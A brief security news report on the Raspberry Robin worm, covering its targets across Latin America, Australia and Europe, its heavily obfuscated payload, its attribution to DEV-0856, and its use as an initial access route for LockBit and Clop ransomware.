The Raspberry Robin worm has been used in attacks against telecommunications and government office systems across Latin America, Australia, and Europe since at least September 2022.
“The main payload itself is packed with more than 10 layers for obfuscation and is capable of delivering a fake payload once it detects sandboxing and security analytics tools,” Trend Micro researcher Christopher So said in a technical analysis published Tuesday.
A majority of the infections have been detected in Argentina, followed by Australia, Mexico, Croatia, Italy, Brazil, France, India, and Colombia.
Raspberry Robin, attributed to an activity cluster tracked by Microsoft as DEV-0856, is being increasingly leveraged by multiple threat actors as an initial access mechanism to deliver payloads such as LockBit and Clop ransomware.
The malware is known for relying on infected USB drives as a distribution vector to download a rogue MSI installer file that deploys the main payload responsible for facilitating post-exploitation.
images from Hacker News